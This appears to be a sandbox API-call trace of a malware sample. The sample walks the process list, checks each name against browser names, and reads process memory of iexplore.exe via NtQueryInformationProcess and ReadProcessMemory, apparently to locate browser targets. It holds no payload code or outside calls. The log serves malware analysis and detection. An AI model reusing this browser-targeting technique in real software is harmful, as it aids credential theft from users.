	[0233.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.541] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.541] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0233.542] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x70cc
	[0233.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.543] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0233.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.543] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.543] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0233.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.544] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.544] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0233.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x70d0
	[0233.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.545] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0233.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.545] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.545] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0233.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.546] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.546] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0233.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x70d4
	[0233.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.547] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0233.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.547] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.547] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0233.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.547] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.548] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0233.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x70d8
	[0233.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.549] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0233.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.550] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.550] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0233.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.550] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.551] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0233.551] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0233.551] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0233.552] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x70dc
	[0233.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.552] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0233.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.553] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.553] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0233.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.554] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.554] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0233.555] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x70e0
	[0233.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.555] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0233.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.555] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.556] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0233.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.556] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.556] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0233.557] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x70e4
	[0233.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.557] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0233.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.557] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.558] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0233.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.558] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.558] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0233.559] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x70e8
	[0233.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.559] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0233.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.560] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.560] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0233.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.560] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.560] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0233.561] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x70ec
	[0233.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.561] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0233.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.562] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.562] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0233.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.563] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.563] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0233.574] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x70f0
	[0233.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.574] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0233.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.575] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.575] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0233.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.575] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.575] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0233.576] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x70f4
	[0233.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.576] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0233.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.577] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.577] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0233.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.578] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.578] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0233.579] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x70f8
	[0233.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.579] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0233.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.579] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.580] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0233.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.582] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.582] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0233.583] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x70fc
	[0233.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.583] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0233.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.584] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.584] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0233.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.584] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.584] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0233.585] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7100
	[0233.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.585] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0233.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.585] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.586] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0233.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.586] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.586] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0233.587] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x7104
	[0233.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.587] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0233.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.588] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.588] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0233.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.589] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.589] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0233.590] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7108
	[0233.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.590] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0233.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.591] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.592] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0233.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.593] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.594] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0233.595] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x710c
	[0233.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.596] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0233.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.596] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.597] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0233.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.598] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.598] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0233.599] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7110
	[0233.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.599] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0233.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.600] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.601] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0233.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.602] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.603] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0233.604] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x7114
	[0233.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.604] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0233.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.605] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.605] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0233.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.606] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.606] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0233.607] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7118
	[0233.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.608] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0233.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.608] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0233.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.608] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0233.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.609] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.609] NtQueryInformationProcess (in: ProcessHandle=0x7118, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0233.609] ReadProcessMemory (in: hProcess=0x7118, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0233.610] ReadProcessMemory (in: hProcess=0x7118, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0233.610] ReadProcessMemory (in: hProcess=0x7118, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0233.610] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0233.610] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0233.612] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x711c
	[0233.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.612] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0233.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.613] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0233.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.613] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0233.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.613] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0233.614] NtQueryInformationProcess (in: ProcessHandle=0x711c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0233.614] ReadProcessMemory (in: hProcess=0x711c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0233.614] ReadProcessMemory (in: hProcess=0x711c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0233.614] ReadProcessMemory (in: hProcess=0x711c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0233.614] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0233.614] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0233.615] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7120
	[0233.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.616] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0233.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.616] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0233.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.617] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0233.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0233.617] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
